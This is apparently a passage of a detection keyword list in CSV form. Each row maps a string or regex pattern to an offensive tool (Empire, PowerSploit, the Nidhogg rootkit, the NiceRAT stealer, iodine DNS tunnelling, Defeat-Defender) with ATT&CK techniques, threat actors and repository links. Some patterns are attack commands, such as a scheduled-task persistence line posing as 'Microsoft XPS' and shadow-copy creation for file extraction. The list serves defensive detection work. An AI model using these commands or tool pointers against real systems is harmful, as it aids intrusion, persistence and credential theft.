"*New-ScheduledTaskTrigger -AtLogOn -User $env:username;Register-ScheduledTask -TaskName ""Microsoft XPS""*",".{0,1000}New\-ScheduledTaskTrigger\s\-AtLogOn\s\-User\s\$env\:username\;Register\-ScheduledTask\s\-TaskName\s\""Microsoft\sXPS\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","53310"
"*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53312"
"*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53313"
"*New-VolumeShadowCopy -Volume C:\*",".{0,1000}New\-VolumeShadowCopy\s\-Volume\sC\:\\.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53314"
"*New-VolumeShadowCopy*",".{0,1000}New\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53315"
"*New-WmiSession.ps1*",".{0,1000}New\-WmiSession\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","53316"
"*nextnet.exe*",".{0,1000}nextnet\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","53317"
"*nfxwi0lomv0gk21unfxgo3dfon0gs1th*",".{0,1000}nfxwi0lomv0gk21unfxgo3dfon0gs1th.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","53318"
"*nginx/striker.log*",".{0,1000}nginx\/striker\.log.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","53319"
"*ngrok-stable-linux-arm.zip*",".{0,1000}ngrok\-stable\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","53324"
"*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *",".{0,1000}\-nh\s127\.0\.0\.1\s\-nP\s7687\s\-nu\sneo4j\s\-np\s.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","53325"
"*nheiniger/SnaffPoint*",".{0,1000}nheiniger\/SnaffPoint.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","53326"
"*niam/noitcetorP-repmaT-ssapyB*",".{0,1000}niam\/noitcetorP\-repmaT\-ssapyB.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","53329"
"*NiceRAT | * Stealer*",".{0,1000}NiceRAT\s\|\s.{0,1000}\s\sStealer.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53331"
"*NiceRAT-main.zip*",".{0,1000}NiceRAT\-main\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53332"
"*Nick Swink aka c0rnbread*",".{0,1000}Nick\sSwink\saka\sc0rnbread.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","53333"
"*nickvourd/COM-Hunter*",".{0,1000}nickvourd\/COM\-Hunter.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","53334"
"*nickvourd/Supernova*",".{0,1000}nickvourd\/Supernova.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","53335"
"*nickzer0/RagingRotator*",".{0,1000}nickzer0\/RagingRotator.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","53336"
"*nicocha30/ligolo-ng*",".{0,1000}nicocha30\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","53337"
"*Nidhogg rootkit*",".{0,1000}Nidhogg\srootkit.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53338"
"*Nidhogg*AntiAnalysis.hpp*",".{0,1000}Nidhogg.{0,1000}AntiAnalysis\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53339"
"*Nidhogg::AntiAnalysis::NidhoggDisableCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggDisableCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53340"
"*Nidhogg::AntiAnalysis::NidhoggEnableDisableEtwTi*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggEnableDisableEtwTi.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53341"
"*Nidhogg::AntiAnalysis::NidhoggListObCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListObCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53342"
"*Nidhogg::AntiAnalysis::NidhoggListPsRoutines*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListPsRoutines.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53343"
"*Nidhogg::AntiAnalysis::NidhoggListRegistryCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListRegistryCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53344"
"*Nidhogg::AntiAnalysis::NidhoggRestoreCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggRestoreCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53345"
"*Nidhogg::FileUtils::NidhoggFileClearAllProtection*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53346"
"*Nidhogg::FileUtils::NidhoggFileProtect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53347"
"*Nidhogg::FileUtils::NidhoggFileUnprotect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53348"
"*Nidhogg::FileUtils::NidhoggQueryFiles*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggQueryFiles.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53349"
"*Nidhogg::ModuleUtils::NidhoggAmsiBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggAmsiBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53350"
